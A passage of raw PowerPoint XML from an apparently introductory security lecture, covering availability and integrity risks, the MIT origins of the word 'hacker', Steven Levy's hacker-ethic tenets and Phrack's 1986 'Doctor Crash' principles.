          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>impaired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> by a blackout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>impaired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>buggy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>These</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>been</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>shown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>underline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0"/>
              <a:t>«Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>needs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0"/>
              <a:t> to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>considered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>aspects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0"/>
              <a:t>»</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107477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C7C37441-CFB0-494C-A736-8B07869D9BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{585192A0-CB46-4D78-9023-F049FA1A72BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>BUT.. WHAT DOES &lt;&lt;HACKER&gt;&gt; MEANS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715F8BFC-E5BA-48BF-80B3-F052A0889215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832051" y="1704976"/>
            <a:ext cx="8064300"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Ethics, culture and hacker philosophy have their roots in the 1950s and 1960s, taking their first steps at the Massachusetts Institute of Technology (MIT) in Boston.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common language of MIT students, "hack" meant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>a project under development or a product made with constructive purposes, with reference to a strong pleasure given by involvement in the project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The characteristics that define a hacker are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>not so much the activities he carries out, but the way in which they are performed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and especially if they are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>provocative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>significant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> actions.</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Today, mainstream usage of "hacker" mostly refers (IN A WRONG WAY) to computer criminals, due to the mass media usage of the word since the 1990s</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20651F56-5B7E-497D-A2A4-E36024D10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636" y="546300"/>
            <a:ext cx="2800350" cy="2800350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266629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CAD7B64E-DB5C-49B6-89D1-E42043FBBFD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA73C6CE-BBC6-40DB-8278-9992D6BC09D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>HACKER ETHICS IN A NUTSHELL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4C89D85-4F60-4A86-B66F-02681C0BF749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3762375" y="6401750"/>
            <a:ext cx="8429625" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://web.archive.org/web/20130730074644/http://project.cyberpunk.ru/idb/hacker_ethics.html</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F034A661-9C81-407E-883F-18F1811D5BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393900" y="1028343"/>
            <a:ext cx="9001125" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The idea of a "hacker ethic" is perhaps best formulated in Steven Levy's 1984 book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Hackers: Heroes of the Computer Revolution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Levy came up with six tenets:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to computers - and anything which might teach you something about the way the world works - should be unlimited and total. Always yield to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hands-On imperative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All information should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Mistrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> authority - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>promote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>decentralization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hackers should be judged by their hacking, not bogus criteria such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>degress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, age, race, or position.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can create art and beauty on a computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computers can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>change your life for the better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368310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EAA29002-B7FC-48C8-A5A1-34DD98DA0B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B6131ED-020E-4CDE-B18E-126976850FEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>HACKER ETHICS IN A NUTSHELL (PT. 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01AF2A1B-87C3-49E4-9DB6-165BFCD3F5AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600075" y="1200150"/>
            <a:ext cx="9131100" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHRACK, recognized as the "official" p/hacker newsletter, expanded on this creed with a rationale that can be summarized in three principles ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Doctor Crash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>," 1986).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hackers reject the notion that "businesses" are the only groups entitled to access and use of modern technology.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hacking is a major weapon in the fight against encroaching computer technology.</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The high cost of equipment is beyond the means of most hackers, which results in the perception that hacking and phreaking are the only recourse to spreading computer literacy to the masses.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CC88F75-4905-4DA7-B483-D7D6564B651A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3762375" y="6401750"/>
            <a:ext cx="8429625" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://web.archive.org/web/20130730074644/http://project.cyberpunk.ru/idb/hacker_ethics.html</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164998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0F4C0DA1-6881-4A00-8B06-541418E365AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BEEB1D2-B4CC-4045-96CC-88D36E3B5688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Hacker ethics in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>nutshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>pt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62CA261D-335D-4A54-B641-930E9E4CED80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="1090059"/>
            <a:ext cx="9131100" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="t"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
